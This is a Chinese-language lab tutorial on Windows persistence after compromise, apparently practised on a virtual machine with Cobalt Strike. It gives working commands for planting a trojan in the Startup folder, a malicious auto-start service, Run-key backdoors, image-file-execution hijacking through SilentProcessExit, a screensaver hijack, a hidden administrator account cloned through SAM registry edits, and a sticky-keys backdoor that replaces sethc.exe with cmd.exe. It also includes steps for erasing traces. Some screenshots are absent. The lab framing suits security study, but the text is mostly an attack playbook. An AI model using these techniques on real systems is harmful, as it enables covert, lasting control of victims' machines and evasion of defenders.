自启动

路径

C:\Users\client\AppData\Roaming\Microsoɇ\Windows\StartMenu\Programs\Startup
这里将恶意木马程序放在这个路径下,靶机一开机,cs就会上线

重启虚拟机,cs上线

服务

添加恶意服务,对应的进程进程试这个木马程序
sc create liu binPath= C:/liu.exe start= auto

然后任务管理器中会有liu这个恶意服务

再次重启虚拟机,发现client和system权限的用户分别上线,这是因为服务中上线的管理员权限,而自启动路径的是client用户。

删除痕迹
sc delete liu

注册表

在注册表中添加恶意程序,添加启动项
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\liu.exe"

重启cs上线

删除痕迹
右键删除即可

runonce也是如此,区别是只能执行一次后就失效了

映像劫持

就是执行打开记事本的命令,却打开了计算器
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"

打开txt文件,也打开了计算器

同理,改执行打开记事本的命令来启动恶意程序
要配合GlobalFlag(系统设置)隐藏:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\liu.exe"

点击txt文件cs也上线

痕迹删除
右键删除即可

屏保

首先在设置中,设置息屏的时间为1分钟

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\liu.exe" /f

等待1分钟,cs上线

痕迹清除
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:/windows/system32/mystify.scr" /f

登录(powershell command命令结合使用)


注销登录后,cs上线

paylaod也是如此


痕迹清除
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\windows\system32\userinit.exe"

隐藏用户

win+r输入lusrmgr.msc,打开本地用户和组管理页面
创建隐藏用户liu


赋予SAM文件夹管理员权限。

找到之前创建隐藏用户的用户信息及权限

将administrators和隐藏用户的注册表文件导出,同时liu隐藏用户的文件也要导出

将此用户信息及权限信息删除。(采用命令行命令)

将Administrator所在权限注册表处替换此前创建隐藏用户,两个都要替换

此时计算机管理内已没有liu这个隐藏用户了

将替换后的用户权限及用户文件用注册表编辑器打开并添加进注册表中

启用隐藏用户liu
net user liu$ /active:yes

现在只有注册表中可以见到隐藏用户liu,其他地方没有
然后切换用户登录下

粘滞键

首先要把C:\Windows\System32下的文件权限拿下
1

2

拿到权限后修改sethc.exe的读写以及系统文件归属,将cmd覆盖sethc.exe

cacls c:/windows/system32/sethc.exe /G client:F
attrib -s -r -h sethc.exe
copy cmd.exe sethc.exe